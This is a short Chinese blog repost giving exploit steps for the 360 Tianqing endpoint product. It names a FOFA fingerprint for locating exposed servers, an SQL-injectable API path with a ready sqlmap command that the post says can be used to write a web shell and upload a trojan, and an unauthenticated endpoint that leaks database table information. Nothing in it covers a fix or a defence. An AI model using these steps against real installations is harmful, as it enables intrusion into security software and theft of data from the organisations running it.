热门标签
热门文章
- 1基于EasyCVR视频汇聚系统的公安网视频联网共享视频云平台建设思路分析(二)
- 2解决vue2版本,el-select下拉框数据量过多,el-select进行分页请求懒加载,滚动防抖加载,支持关键字过滤及其他el-select属性_el-select-v2
- 3在windows服务器上搭建git服务器gogs_windows gogs安装
- 4html表白代码
- 5Layui 组装前端框架Layui的Tree菜单数据的json格式_layui tree js
- 6SQL全文本检索应用
- 7ELF 文件格式常见段名称及自定义段_elf文件格式允许自定义段
- 8Docker:自定义镜像上传阿里云_自定义centos 7 镜像并且上传到阿里云
- 9python画国际象棋棋盘图片_python3 turtle 画国际象棋棋盘
- 10python orm框架
当前位置: article > 正文
360天擎sql注入&&未授权访问_360新天擎未授权访问
作者:你好赵伟 | 2024-02-27 06:34:33
赞
踩
360新天擎未授权访问
天擎 前台SQL注入
漏洞描述
天擎 存在SQL注入,攻击者可以通过漏洞上传木马
FOFA指纹
title=“360新天擎”
漏洞复现
漏洞地址
/api/dp/rptsvcsyncpoint?ccid=1
注入写shell:
sqlmap
python sqlmap.py -u https://x.x.x.x:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL
- 1
天擎 数据库信息泄露漏洞
漏洞描述
天擎 存在未授权越权访问,造成敏感信息泄露
漏洞复现
地址
/api/dbstat/gettablessize
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
